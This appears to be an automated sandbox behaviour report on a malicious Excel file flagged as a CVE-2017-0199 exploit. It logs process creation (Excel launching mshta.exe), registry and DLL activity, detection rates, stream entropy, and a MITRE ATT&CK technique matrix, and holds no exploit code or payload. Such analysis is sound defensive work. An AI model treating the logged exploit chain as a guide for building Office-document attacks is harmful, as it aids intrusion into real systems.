Source: ~DFBCA3F597EEDC166E.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'securiteinfo.com.exploit.cve-2017-0199.05.gen.17087.14702.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal60.expl.winXLSX@6/14@4/4
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{B54C726B-7536-4F20-8418-90CE65C7F04D} - OProcSessId.datJump to behavior
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxOLE indicator, Workbook stream: true
Source: CC850000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxReversingLabs: Detection: 23%
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxVirustotal: Detection: 28%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxStatic file information: File size 1091072 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DFBCA3F597EEDC166E.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxStream path 'MBD00420638/Package' entropy: 7.98871009096 (max. 8.0)
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxStream path 'Workbook' entropy: 7.99851520925 (max. 8.0)
Source: ~DFBCA3F597EEDC166E.TMP.0.drStream path 'Package' entropy: 7.99074409815 (max. 8.0)
Source: CC850000.0.drStream path 'MBD00420638/Package' entropy: 7.99074409815 (max. 8.0)
Source: CC850000.0.drStream path 'Workbook' entropy: 7.99757962009 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 775Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.